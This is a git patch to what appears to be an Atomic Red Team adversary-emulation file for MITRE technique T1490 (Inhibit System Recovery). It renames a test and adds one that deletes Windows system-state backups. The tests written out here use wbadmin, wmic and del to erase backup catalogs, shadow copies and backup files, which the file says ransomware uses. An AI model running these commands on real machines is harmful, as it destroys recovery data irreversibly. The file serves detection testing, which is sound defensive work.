From 373176bcba85f4ae978b2cd24c06cfd85fe327d5 Mon Sep 17 00:00:00 2001
From: Michael Haag <5632822+MHaggis@users.noreply.github.com>
Date: Sat, 23 Jan 2021 17:53:20 -0700
Subject: [PATCH] T1490 - WBAdmin (#1375)

* Added wbadmin delete systemstatebackup

* Update T1490.yaml

Co-authored-by: mhaag-spl <76067280+mhaag-spl@users.noreply.github.com>
---
 atomics/T1490/T1490.yaml | 15 ++++++++++++---
 1 file changed, 12 insertions(+), 3 deletions(-)

diff --git a/atomics/T1490/T1490.yaml b/atomics/T1490/T1490.yaml
index d0f6568e..aea49d27 100644
--- a/atomics/T1490/T1490.yaml
+++ b/atomics/T1490/T1490.yaml
@@ -37,7 +37,7 @@ atomic_tests:
       wmic.exe shadowcopy delete
     name: command_prompt
     elevation_required: true
-- name: Windows - Delete Windows Backup Catalog
+- name: Windows - wbadmin Delete Windows Backup Catalog
   auto_generated_guid: 263ba6cb-ea2b-41c9-9d4e-b652dadd002c
   description: |
     Deletes Windows Backup Catalog. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. Upon execution,
@@ -46,7 +46,7 @@ atomic_tests:
   - windows
   executor:
     command: |
-      wbadmin.exe delete catalog -quiet
+      wbadmin delete catalog -quiet
     name: command_prompt
     elevation_required: true
 - name: Windows - Disable Windows Recovery Console Repair
@@ -91,4 +91,13 @@ atomic_tests:
       del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk
     name: command_prompt
     elevation_required: true
-
+- name: Windows - wbadmin Delete systemstatebackup
+  description: |
+    Deletes the Windows systemstatebackup using wbadmin.exe. This technique is used by numerous ransomware families. This may only be successful on server platforms that have Windows Backup enabled.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      wbadmin delete systemstatebackup -keepVersions:0
+    name: command_prompt
+    elevation_required: true
\ No newline at end of file